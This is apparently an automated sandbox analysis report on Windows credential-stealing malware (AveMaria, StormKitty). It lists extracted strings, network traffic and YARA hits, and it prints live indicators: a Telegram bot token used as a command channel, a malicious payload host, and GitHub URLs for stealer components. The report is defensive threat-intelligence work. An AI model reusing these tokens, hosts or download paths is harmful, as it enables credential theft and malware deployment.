00 06 00 00 00 00 00 00 00 00 40 01 00 00 04 00 00 bc 11 02 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 b0 f0 00 00 14 09 00 00 c0 10 01 00 8c 00 00 00 00 20 01 00 08 04 00 00 00 00 00 00 00 00 00 00 00 08 01 00 48 3f 00 00 00 30 01 00 94 0a 00 00 b0 1f 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 1f 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 bc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c4 e9 00 00 00 10 00 00 00 ea 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 44 06 00 00 00 00 01 00 00 02 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 b8 05 00 00 00 10 01 00 00 06 00 00 00 f0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 08 04 00 00 00 20 01 00 00 06 00 00 00 f6 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 94 0a 00 00 00 30 01 00 00 0c 00 00 00 fc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Source: chormuim.exe, 00000008.00000000.371882143.0000000002C73000.00000004.00000001.sdmp	String found in binary or memory: http://api.telegram.org
Source: svchoste.exe, 00000004.00000003.300385221.0000000003821000.00000004.00000001.sdmp, svchoste.exe, 00000004.00000003.304315459.0000000003821000.00000004.00000001.sdmp, svchoste.exe, 00000004.00000003.305330461.0000000003821000.00000004.00000001.sdmp, softokn3.dll.4.dr, nss3.dll.4.dr, freebl3.dll.4.dr, mozglue.dll.4.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: svchoste.exe, 00000004.00000003.300385221.0000000003821000.00000004.00000001.sdmp, svchoste.exe, 00000004.00000003.304315459.0000000003821000.00000004.00000001.sdmp, svchoste.exe, 00000004.00000003.305330461.0000000003821000.00000004.00000001.sdmp, softokn3.dll.4.dr, nss3.dll.4.dr, freebl3.dll.4.dr, mozglue.dll.4.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: chormuim.exe, 00000008.00000000.373931616.000000001BA2C000.00000004.00000010.sdmp, chormuim.exe, 00000008.00000000.366204607.000000001BA2C000.00000004.00000010.sdmp	String found in binary or memory: http://crl.globals
Source: chormuim.exe, 00000008.00000002.409485125.000000001BA2C000.00000004.00000010.sdmp, chormuim.exe, 00000008.00000000.373931616.000000001BA2C000.00000004.00000010.sdmp, chormuim.exe, 00000008.00000000.366204607.000000001BA2C000.00000004.00000010.sdmp, WerFault.exe, 0000001D.00000003.396683828.0000026D6FF03000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000002.398019277.0000026D6FF03000.00000004.00000001.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: svchoste.exe, 00000004.00000003.300385221.0000000003821000.00000004.00000001.sdmp, svchoste.exe, 00000004.00000003.304315459.0000000003821000.00000004.00000001.sdmp, svchoste.exe, 00000004.00000003.305330461.0000000003821000.00000004.00000001.sdmp, softokn3.dll.4.dr, nss3.dll.4.dr, freebl3.dll.4.dr, mozglue.dll.4.dr	String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: svchoste.exe, 00000004.00000003.300385221.0000000003821000.00000004.00000001.sdmp, svchoste.exe, 00000004.00000003.304315459.0000000003821000.00000004.00000001.sdmp, svchoste.exe, 00000004.00000003.305330461.0000000003821000.00000004.00000001.sdmp, softokn3.dll.4.dr, nss3.dll.4.dr, freebl3.dll.4.dr, mozglue.dll.4.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: svchoste.exe, 00000004.00000003.300385221.0000000003821000.00000004.00000001.sdmp, svchoste.exe, 00000004.00000003.304315459.0000000003821000.00000004.00000001.sdmp, svchoste.exe, 00000004.00000003.305330461.0000000003821000.00000004.00000001.sdmp, softokn3.dll.4.dr, nss3.dll.4.dr, freebl3.dll.4.dr, mozglue.dll.4.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: svchoste.exe, 00000004.00000003.300385221.0000000003821000.00000004.00000001.sdmp, svchoste.exe, 00000004.00000003.304315459.0000000003821000.00000004.00000001.sdmp, svchoste.exe, 00000004.00000003.305330461.0000000003821000.00000004.00000001.sdmp, softokn3.dll.4.dr, nss3.dll.4.dr, freebl3.dll.4.dr, mozglue.dll.4.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: svchoste.exe, 00000004.00000003.300385221.0000000003821000.00000004.00000001.sdmp, svchoste.exe, 00000004.00000003.304315459.0000000003821000.00000004.00000001.sdmp, svchoste.exe, 00000004.00000003.305330461.0000000003821000.00000004.00000001.sdmp, softokn3.dll.4.dr, nss3.dll.4.dr, freebl3.dll.4.dr, mozglue.dll.4.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
Source: chormuim.exe, 00000008.00000002.407468863.0000000002B0D000.00000004.00000001.sdmp	String found in binary or memory: http://download.divx.com/player/divxdotcom/DivXWebPlayerInstaller.exe
Source: chormuim.exe, 00000008.00000002.407468863.0000000002B0D000.00000004.00000001.sdmp	String found in binary or memory: http://fpdownload.macromedia.com/get/shockwave/default/english/win95nt/latest/Shockwave_Installer_Sl
Source: chormuim.exe, 00000008.00000000.356408248.0000000002903000.00000004.00000001.sdmp, chormuim.exe, 00000008.00000002.406912489.0000000002913000.00000004.00000001.sdmp	String found in binary or memory: http://icanhazip.com
Source: chormuim.exe, 00000008.00000000.356408248.0000000002903000.00000004.00000001.sdmp	String found in binary or memory: http://icanhazip.com/
Source: chormuim.exe, 00000008.00000000.356408248.0000000002903000.00000004.00000001.sdmp	String found in binary or memory: http://icanhazip.com/8
Source: chormuim.exe, 00000008.00000000.356408248.0000000002903000.00000004.00000001.sdmp	String found in binary or memory: http://icanhazip.comx
Source: chormuim.exe, 00000008.00000000.371044114.00000000029DD000.00000004.00000001.sdmp, chormuim.exe, 00000008.00000000.356697477.00000000029F7000.00000004.00000001.sdmp	String found in binary or memory: http://ip-api.com
Source: chormuim.exe, 00000008.00000000.356697477.00000000029F7000.00000004.00000001.sdmp	String found in binary or memory: http://ip-api.com/line/?fields=h
Source: chormuim.exe, 00000008.00000000.356697477.00000000029F7000.00000004.00000001.sdmp, chormuim.exe, 00000008.00000000.355408259.0000000002691000.00000004.00000001.sdmp, chormuim.exe, 00000008.00000002.406228414.0000000002691000.00000004.00000001.sdmp	String found in binary or memory: http://ip-api.com/line/?fields=hosting
Source: chormuim.exe, 00000008.00000000.370201907.0000000002691000.00000004.00000001.sdmp, chormuim.exe, 00000008.00000000.355408259.0000000002691000.00000004.00000001.sdmp, chormuim.exe, 00000008.00000002.406228414.0000000002691000.00000004.00000001.sdmp	String found in binary or memory: http://ip-api.comV
Source: chormuim.exe, 00000008.00000000.371044114.00000000029DD000.00000004.00000001.sdmp, chormuim.exe, 00000008.00000000.356697477.00000000029F7000.00000004.00000001.sdmp	String found in binary or memory: http://ip-api.comx
Source: svchoste.exe, 00000004.00000003.300385221.0000000003821000.00000004.00000001.sdmp, svchoste.exe, 00000004.00000003.304315459.0000000003821000.00000004.00000001.sdmp, svchoste.exe, 00000004.00000003.305330461.0000000003821000.00000004.00000001.sdmp, softokn3.dll.4.dr, nss3.dll.4.dr, freebl3.dll.4.dr, mozglue.dll.4.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: svchoste.exe, 00000004.00000003.300385221.0000000003821000.00000004.00000001.sdmp, svchoste.exe, 00000004.00000003.304315459.0000000003821000.00000004.00000001.sdmp, svchoste.exe, 00000004.00000003.305330461.0000000003821000.00000004.00000001.sdmp, softokn3.dll.4.dr, nss3.dll.4.dr, freebl3.dll.4.dr, mozglue.dll.4.dr	String found in binary or memory: http://ocsp.digicert.com0N
Source: svchoste.exe, 00000004.00000003.300385221.0000000003821000.00000004.00000001.sdmp, svchoste.exe, 00000004.00000003.304315459.0000000003821000.00000004.00000001.sdmp, svchoste.exe, 00000004.00000003.305330461.0000000003821000.00000004.00000001.sdmp, softokn3.dll.4.dr, nss3.dll.4.dr, freebl3.dll.4.dr, mozglue.dll.4.dr	String found in binary or memory: http://ocsp.thawte.com0
Source: svchoste.exe, 00000004.00000002.329775240.0000000001312000.00000004.00000020.sdmp	String found in binary or memory: http://pplonline.org/Cgi/
Source: svchoste.exe, 00000004.00000002.329735600.00000000012BA000.00000004.00000020.sdmp	String found in binary or memory: http://pplonline.org/Cgi//1.jpg
Source: svchoste.exe, 00000004.00000002.329735600.00000000012BA000.00000004.00000020.sdmp	String found in binary or memory: http://pplonline.org/Cgi//1.jpgU
Source: svchoste.exe, 00000004.00000002.329735600.00000000012BA000.00000004.00000020.sdmp	String found in binary or memory: http://pplonline.org/Cgi//2.jpg
Source: svchoste.exe, 00000004.00000002.329735600.00000000012BA000.00000004.00000020.sdmp	String found in binary or memory: http://pplonline.org/Cgi//2.jpg2
Source: svchoste.exe, 00000004.00000002.329735600.00000000012BA000.00000004.00000020.sdmp	String found in binary or memory: http://pplonline.org/Cgi//3.jpg
Source: svchoste.exe, 00000004.00000002.329735600.00000000012BA000.00000004.00000020.sdmp	String found in binary or memory: http://pplonline.org/Cgi//3.jpgK
Source: svchoste.exe, 00000004.00000002.329735600.00000000012BA000.00000004.00000020.sdmp	String found in binary or memory: http://pplonline.org/Cgi//4.jpg
Source: svchoste.exe, 00000004.00000002.329735600.00000000012BA000.00000004.00000020.sdmp	String found in binary or memory: http://pplonline.org/Cgi//5.jpg
Source: svchoste.exe, 00000004.00000002.329735600.00000000012BA000.00000004.00000020.sdmp	String found in binary or memory: http://pplonline.org/Cgi//6.jpg
Source: svchoste.exe, 00000004.00000002.329735600.00000000012BA000.00000004.00000020.sdmp	String found in binary or memory: http://pplonline.org/Cgi//7.jpg
Source: svchoste.exe, 00000004.00000002.329735600.00000000012BA000.00000004.00000020.sdmp	String found in binary or memory: http://pplonline.org/Cgi//main.php
Source: WerFault.exe, 0000001D.00000003.382485433.0000026D70BB0000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/authentication
Source: WerFault.exe, 0000001D.00000003.382485433.0000026D70BB0000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/authorizationdecisionzhttp://schemas.xmlsoap.o
Source: WerFault.exe, 0000001D.00000003.382485433.0000026D70BB0000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dateofbirthrhttp://schemas.xmlsoap.org/ws/2005
Source: WerFault.exe, 0000001D.00000003.382485433.0000026D70BB0000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/denyonlysid
Source: WerFault.exe, 0000001D.00000003.382485433.0000026D70BB0000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/emailaddressxhttp://schemas.xmlsoap.org/ws/200
Source: WerFault.exe, 0000001D.00000003.382485433.0000026D70BB0000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/locality
Source: WerFault.exe, 0000001D.00000003.382485433.0000026D70BB0000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/mobilephone
Source: chormuim.exe, 00000008.00000000.370201907.0000000002691000.00000004.00000001.sdmp, chormuim.exe, 00000008.00000000.355408259.0000000002691000.00000004.00000001.sdmp, chormuim.exe, 00000008.00000002.406228414.0000000002691000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.382485433.0000026D70BB0000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: WerFault.exe, 0000001D.00000003.382485433.0000026D70BB0000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameidentifier
Source: WerFault.exe, 0000001D.00000003.382485433.0000026D70BB0000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/otherphone
Source: WerFault.exe, 0000001D.00000003.382485433.0000026D70BB0000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/postalcoderhttp://schemas.xmlsoap.org/ws/2005/
Source: WerFault.exe, 0000001D.00000003.382485433.0000026D70BB0000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/stateorprovince
Source: WerFault.exe, 0000001D.00000003.382485433.0000026D70BB0000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/streetaddresszhttp://schemas.xmlsoap.org/ws/20
Source: WerFault.exe, 0000001D.00000003.382485433.0000026D70BB0000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/thumbprintrhttp://schemas.xmlsoap.org/ws/2005/
Source: WerFault.exe, 0000001D.00000003.382485433.0000026D70BB0000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/x500distinguishednamejhttp://schemas.xmlsoap.o
Source: svchoste.exe, 00000004.00000003.300385221.0000000003821000.00000004.00000001.sdmp, svchoste.exe, 00000004.00000003.304315459.0000000003821000.00000004.00000001.sdmp, svchoste.exe, 00000004.00000003.305330461.0000000003821000.00000004.00000001.sdmp, softokn3.dll.4.dr, nss3.dll.4.dr, freebl3.dll.4.dr, mozglue.dll.4.dr	String found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: svchoste.exe, 00000004.00000003.300385221.0000000003821000.00000004.00000001.sdmp, svchoste.exe, 00000004.00000003.304315459.0000000003821000.00000004.00000001.sdmp, svchoste.exe, 00000004.00000003.305330461.0000000003821000.00000004.00000001.sdmp, softokn3.dll.4.dr, nss3.dll.4.dr, freebl3.dll.4.dr, mozglue.dll.4.dr	String found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: svchoste.exe, 00000004.00000003.300385221.0000000003821000.00000004.00000001.sdmp, svchoste.exe, 00000004.00000003.304315459.0000000003821000.00000004.00000001.sdmp, svchoste.exe, 00000004.00000003.305330461.0000000003821000.00000004.00000001.sdmp, softokn3.dll.4.dr, nss3.dll.4.dr, freebl3.dll.4.dr, mozglue.dll.4.dr	String found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: Amcache.hve.29.dr	String found in binary or memory: http://upx.sf.net
Source: DotNetZip.dll.8.dr	String found in binary or memory: http://www.codeplex.com/DotNetZip
Source: mozglue.dll.4.dr	String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: svchoste.exe, 00000004.00000003.300385221.0000000003821000.00000004.00000001.sdmp, svchoste.exe, 00000004.00000003.304315459.0000000003821000.00000004.00000001.sdmp, svchoste.exe, 00000004.00000003.305330461.0000000003821000.00000004.00000001.sdmp, softokn3.dll.4.dr, nss3.dll.4.dr, freebl3.dll.4.dr, mozglue.dll.4.dr	String found in binary or memory: http://www.mozilla.com0
Source: svchoste.exe, 00000004.00000003.318310238.0000000001366000.00000004.00000001.sdmp, chormuim.exe, 00000008.00000000.371716058.0000000002C06000.00000004.00000001.sdmp, chormuim.exe, 00000008.00000002.407794695.0000000002C06000.00000004.00000001.sdmp, chormuim.exe, 00000008.00000000.370970662.0000000002982000.00000004.00000001.sdmp, chormuim.exe, 00000008.00000000.356577085.0000000002982000.00000004.00000001.sdmp, tmp3B84.tmp.dat.8.dr, temp.4.dr, tmp7B6F.tmp.dat.8.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: chormuim.exe, 00000008.00000000.356875831.0000000002AEF000.00000004.00000001.sdmp	String found in binary or memory: https://api.tele
Source: chormuim.exe, 00000008.00000000.371882143.0000000002C73000.00000004.00000001.sdmp	String found in binary or memory: https://api.telegrP
Source: chormuim.exe, 00000008.00000000.371882143.0000000002C73000.00000004.00000001.sdmp	String found in binary or memory: https://api.telegram.org
Source: chormuim.exe, 00000008.00000000.370391280.0000000002790000.00000004.00000001.sdmp, chormuim.exe, 00000008.00000000.371765057.0000000002C35000.00000004.00000001.sdmp, chormuim.exe, 00000008.00000000.356875831.0000000002AEF000.00000004.00000001.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: chormuim.exe, 00000008.00000000.370391280.0000000002790000.00000004.00000001.sdmp, chormuim.exe, 00000008.00000000.371882143.0000000002C73000.00000004.00000001.sdmp	String found in binary or memory: https://api.telegram.org/bot1456609378:AAEnBfmWHEJfWWOpiWK1aoQnqzDubVAn7J4/getMe
Source: chormuim.exe, 00000008.00000000.370391280.0000000002790000.00000004.00000001.sdmp	String found in binary or memory: https://api.telegram.orgx
Source: svchoste.exe, 00000004.00000003.318310238.0000000001366000.00000004.00000001.sdmp, chormuim.exe, 00000008.00000000.371716058.0000000002C06000.00000004.00000001.sdmp, chormuim.exe, 00000008.00000002.407794695.0000000002C06000.00000004.00000001.sdmp, chormuim.exe, 00000008.00000000.370970662.0000000002982000.00000004.00000001.sdmp, chormuim.exe, 00000008.00000000.356577085.0000000002982000.00000004.00000001.sdmp, tmp3B84.tmp.dat.8.dr, temp.4.dr, tmp7B6F.tmp.dat.8.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: svchoste.exe, 00000004.00000003.318310238.0000000001366000.00000004.00000001.sdmp, chormuim.exe, 00000008.00000000.371716058.0000000002C06000.00000004.00000001.sdmp, chormuim.exe, 00000008.00000002.407794695.0000000002C06000.00000004.00000001.sdmp, chormuim.exe, 00000008.00000000.370970662.0000000002982000.00000004.00000001.sdmp, chormuim.exe, 00000008.00000000.356577085.0000000002982000.00000004.00000001.sdmp, tmp3B84.tmp.dat.8.dr, temp.4.dr, tmp7B6F.tmp.dat.8.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: svchoste.exe, 00000004.00000003.318310238.0000000001366000.00000004.00000001.sdmp, chormuim.exe, 00000008.00000000.371716058.0000000002C06000.00000004.00000001.sdmp, chormuim.exe, 00000008.00000002.407794695.0000000002C06000.00000004.00000001.sdmp, chormuim.exe, 00000008.00000000.370970662.0000000002982000.00000004.00000001.sdmp, chormuim.exe, 00000008.00000000.356577085.0000000002982000.00000004.00000001.sdmp, tmp3B84.tmp.dat.8.dr, temp.4.dr, tmp7B6F.tmp.dat.8.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: svchoste.exe, 00000004.00000003.318310238.0000000001366000.00000004.00000001.sdmp, chormuim.exe, 00000008.00000000.371716058.0000000002C06000.00000004.00000001.sdmp, chormuim.exe, 00000008.00000002.407794695.0000000002C06000.00000004.00000001.sdmp, chormuim.exe, 00000008.00000000.370970662.0000000002982000.00000004.00000001.sdmp, chormuim.exe, 00000008.00000000.356577085.0000000002982000.00000004.00000001.sdmp, tmp3B84.tmp.dat.8.dr, temp.4.dr, tmp7B6F.tmp.dat.8.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: chormuim.exe.6.dr	String found in binary or memory: https://github.com/LimerBoy/StormKitty
Source: chormuim.exe, 00000008.00000002.408878521.000000001B711000.00000004.00000001.sdmp	String found in binary or memory: https://java.sun.com
Source: chormuim.exe, 00000008.00000000.355699138.00000000026F3000.00000004.00000001.sdmp, chormuim.exe, 00000008.00000000.370261870.00000000026F3000.00000004.00000001.sdmp	String found in binary or memory: https://raw.githubusercontent.com
Source: chormuim.exe, 00000008.00000002.406228414.0000000002691000.00000004.00000001.sdmp	String found in binary or memory: https://raw.githubusercontent.com/caxmd/StormKitty/master/StormKitty/stub/packages/AnonFileApi.1.14.
Source: chormuim.exe, 00000008.00000002.406228414.0000000002691000.00000004.00000001.sdmp	String found in binary or memory: https://raw.githubusercontent.com/caxmd/StormKitty/master/StormKitty/stub/packages/DotNetZip.1.13.8/
Source: svchoste.exe, 00000004.00000003.318310238.0000000001366000.00000004.00000001.sdmp, chormuim.exe, 00000008.00000000.371716058.0000000002C06000.00000004.00000001.sdmp, chormuim.exe, 00000008.00000002.407794695.0000000002C06000.00000004.00000001.sdmp, chormuim.exe, 00000008.00000000.370970662.0000000002982000.00000004.00000001.sdmp, chormuim.exe, 00000008.00000000.356577085.0000000002982000.00000004.00000001.sdmp, tmp3B84.tmp.dat.8.dr, temp.4.dr, tmp7B6F.tmp.dat.8.dr	String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: svchoste.exe, 00000004.00000003.318310238.0000000001366000.00000004.00000001.sdmp, chormuim.exe, 00000008.00000000.371716058.0000000002C06000.00000004.00000001.sdmp, chormuim.exe, 00000008.00000002.407794695.0000000002C06000.00000004.00000001.sdmp, chormuim.exe, 00000008.00000000.370970662.0000000002982000.00000004.00000001.sdmp, chormuim.exe, 00000008.00000000.356577085.0000000002982000.00000004.00000001.sdmp, tmp3B84.tmp.dat.8.dr, temp.4.dr, tmp7B6F.tmp.dat.8.dr	String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: chormuim.exe, 00000008.00000002.407468863.0000000002B0D000.00000004.00000001.sdmp	String found in binary or memory: https://support.google.com/chrome/?p=plugin_divx
Source: svchoste.exe, 00000004.00000002.330933696.0000000003820000.00000004.00000001.sdmp, chormuim.exe, 00000008.00000002.407468863.0000000002B0D000.00000004.00000001.sdmp	String found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
Source: chormuim.exe, 00000008.00000002.407468863.0000000002B0D000.00000004.00000001.sdmp	String found in binary or memory: https://support.google.com/chrome/?p=plugin_shockwave
Source: svchoste.exe, 00000004.00000002.330933696.0000000003820000.00000004.00000001.sdmp, chormuim.exe, 00000008.00000002.407468863.0000000002B0D000.00000004.00000001.sdmp	String found in binary or memory: https://support.google.com/chrome/answer/6258784
Source: svchoste.exe, 00000004.00000003.300385221.0000000003821000.00000004.00000001.sdmp, svchoste.exe, 00000004.00000003.304315459.0000000003821000.00000004.00000001.sdmp, svchoste.exe, 00000004.00000003.305330461.0000000003821000.00000004.00000001.sdmp, softokn3.dll.4.dr, nss3.dll.4.dr, freebl3.dll.4.dr, mozglue.dll.4.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: svchoste.exe, 00000004.00000003.318310238.0000000001366000.00000004.00000001.sdmp, chormuim.exe, 00000008.00000000.371716058.0000000002C06000.00000004.00000001.sdmp, chormuim.exe, 00000008.00000002.407794695.0000000002C06000.00000004.00000001.sdmp, chormuim.exe, 00000008.00000000.370970662.0000000002982000.00000004.00000001.sdmp, chormuim.exe, 00000008.00000000.356577085.0000000002982000.00000004.00000001.sdmp, tmp3B84.tmp.dat.8.dr, temp.4.dr, tmp7B6F.tmp.dat.8.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

Source: unknown

DNS traffic detected: queries for: pplonline.org

Source: C:\Users\user\AppData\Local\Temp\svchoste.exe

Code function: 4_2_00B91CF0 InternetSetFilePointer,InternetReadFile,_memset,HttpQueryInfoA,_memcpy_s,_memcpy_s,

4_2_00B91CF0

Source: global traffic	HTTP traffic detected: GET /caxmd/StormKitty/master/StormKitty/stub/packages/DotNetZip.1.13.8/lib/net40/DotNetZip.dll HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /caxmd/StormKitty/master/StormKitty/stub/packages/AnonFileApi.1.14.6/lib/net40/AnonFileApi.dll HTTP/1.1Host: raw.githubusercontent.com
Source: global traffic	HTTP traffic detected: GET /bot1456609378:AAEnBfmWHEJfWWOpiWK1aoQnqzDubVAn7J4/getMe HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: icanhazip.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive

Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745

Source: chormuim.exe, 00000008.00000002.407468863.0000000002B0D000.00000004.00000001.sdmp

String found in binary or memory: ium PDF Plugin","versions":[{"comment":"Chromium PDF Plugin has no version information.","status":"fully_trusted","version":"0"}]},"divx-player":{"group_name_matcher":"*DivX Web Player*","help_url":"https://support.google.com/chrome/?p=plugin_divx","lang":"en-US","mime_types":["video/divx","video/x-matroska"],"name":"DivX Web Player","url":"http://download.divx.com/player/divxdotcom/DivXWebPlayerInstaller.exe","versions":[{"status":"requires_authorization","version":"1.4.3.4"}]},"facebook-video-calling":{"group_name_matcher":"*Facebook Video*","lang":"en-US","mime_types":["application/skypesdk-plugin"],"name":"Facebook Video Calling","url":"https://www.facebook.com/chat/video/videocalldownload.php","versions":[{"comment":"We do not track version information for the Facebook Video Calling Plugin.","status":"requires_authorization","version":"0"}]},"google-chrome-pdf":{"group_name_matcher":"*Chrome PDF Viewer*","mime_types":[],"name":"Chrome PDF Viewer","versions":[{"comment":"Google Chrome PDF Viewer has no version information.","status":"fully_trusted","version":"0"}]},"google-chrome-pdf-plugin":{"group_name_matcher":"*Chrome PDF Plugin*","mime_types":[],"name":"Chrome PDF Plugin","versions":[{"comment":"Google Chrome PDF Plugin has no version information.","status":"fully_trusted","version":"0"}]},"google-earth":{"group_name_matcher":"*Google Earth*","lang":"en-US","mime_types":["application/geplugin"],"name":"Google Earth","url":"http://www.google.com/earth/explore/products/plugin.html","versions":[{"comment":"We do not track version information for the Google Earth Plugin.","status":"requires_authorization","version":"0"}]},"google-talk":{"group_name_matcher":"*Google Talk*","mime_types":[],"name":"Google Talk","versions":[{"comment":"'Google Talk Plugin' and 'Google Talk Plugin Video Accelerator' use two completely different versioning schemes, so we can't define a minimum version.","status":"requires_authorization","version":"0"}]},"google-update":{"group_name_matcher":"Google Update","mime-types":[],"name":"Google Update","versions":[{"comment":"Google Update plugin is versioned but kept automatically up to date","status":"requires_authorization","version":"0"}]},"ibm-java-runtime-environment":{"group_name_matcher":"*IBM*Java*","mime_types":["application/x-java-applet","application/x-java-applet;jpi-version=1.7.0_05","application/x-java-applet;version=1.1","application/x-java-applet;version=1.1.1","application/x-java-applet;version=1.1.2","application/x-java-applet;version=1.1.3","application/x-java-applet;version=1.2","application/x-java-applet;version=1.2.1","application/x-java-applet;version=1.2.2","application/x-java-applet;version=1.3","application/x-java-applet;version=1.3.1","application/x-java-applet;version=1.4","application/x-java-applet;version=1.4.1","application/x-java-applet;version=1.4.2","application/x-java-applet;version=1.5","application/x-java-applet;version=1.6","application/x-java-applet;version=1.7","application/x-java

Source: unknown

Source: unknown	HTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.3:49745 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.3:49747 version: TLS 1.2

Source: svchoste.exe, 00000004.00000002.329735600.00000000012BA000.00000004.00000020.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

Source: C:\ProgramData\AMD Driver\taskshell.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\ProgramData\AMD Driver\taskshell.exe	Window created: window name: CLIPBRDWNDCLASS
Source: C:\ProgramData\AMD Driver\taskshell.exe	Window created: window name: CLIPBRDWNDCLASS

E-Banking Fraud:

Yara detected AveMaria stealer

Show sources

Source: Yara match	File source: 00000008.00000000.370201907.0000000002691000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000000.355408259.0000000002691000.00000004.00000001.sdmp, type: MEMORY
